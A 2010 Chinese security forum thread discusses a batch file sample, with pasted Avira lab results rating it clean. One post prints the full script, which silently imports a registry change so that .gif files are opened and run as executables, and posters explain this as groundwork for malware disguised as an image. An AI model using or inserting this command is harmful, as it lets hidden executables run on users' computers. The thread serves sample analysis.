过全部!金山的云也倒下!

Aar0N

代码意思就是修改注册表，当打开GIF格式的文件，把GIF格式的文件当EXE格式打开，据本人猜测这只是病毒运行前做的铺垫，你没上传病毒本体，病毒本体可能是gif格式的文件，由于本身原本是EXE格式，无法预览......
此文件也可以被认为是个人编写还原病毒修改过注册表的bat文件，只是和上面原理反过来，杀软是不会理睬这部分代码的，除非是修改注册表起映象劫持杀软的代码

Aar0N

回复 10楼 网名丢失  的帖子

据本人猜测这可能是病毒运行前做的铺垫，运行自身副本的衍生物，详情见11楼
   

网名丢失

据本人猜测这可能是病毒运行前做的铺垫，运行自身副本的衍生物，详情见11楼
Aar0N 发表于 2010.9.29 21:50

现在这么多杀软都说没病毒怎么办啊，我上报了红伞它说未发现任何恶意行为。哎悲剧了。


下面提供了文件及其结果的列表:文件 ID         文件名        大小(字节)        结果
25900228         vvt.bat         249 Byte         CLEAN



下面提供了与每个样本相关的详细报告: 文件名        结果
vvt.bat         CLEAN


已确定“vvt.bat”文件是“CLEAN”。 我们的分析人员未发现任何恶意内容

hujiwa

@echo off
color 1A
cmd /c ECHO Windows Registry Editor Version 5.00>gif.reg & ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg&ECHO "Content Type"="application/x-msdownload">>gif.reg&ECHO @="exefile">>gif.reg&regedit /s gif.reg>nul 2>nul

hujiwa

回复 10楼 网名丢失  的帖子


    NPE 不报。会看bat的直接看bat就知道了。恐怕楼主的样本和空白文档时同一个安全级别的

solstice1988

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.
Tracking number: INC00607389.




We received the following archive files:



File ID Filename Size (Byte) Result
25900227  v.rar 320 Byte OK

A listing of files contained inside archives alongside their results can be found below:

File ID Filename Size (Byte) Result
25900228  vvt.bat  249 Byte  CLEAN


Please find a detailed report concerning each individual sample below:

Filename Result
vvt.bat  CLEAN

The file 'vvt.bat' has been determined to be 'CLEAN'. 我们的分析人员未发现任何恶意内容。

qweteacher

  1KB？

yusup

为社么我用金山扫了一下,金山竟然出问题了.[img]

keepmov

没有报。生产呢个一个reg文件。有注册表防护的话不久给截下来了嘛

猪头大队

无意义的样本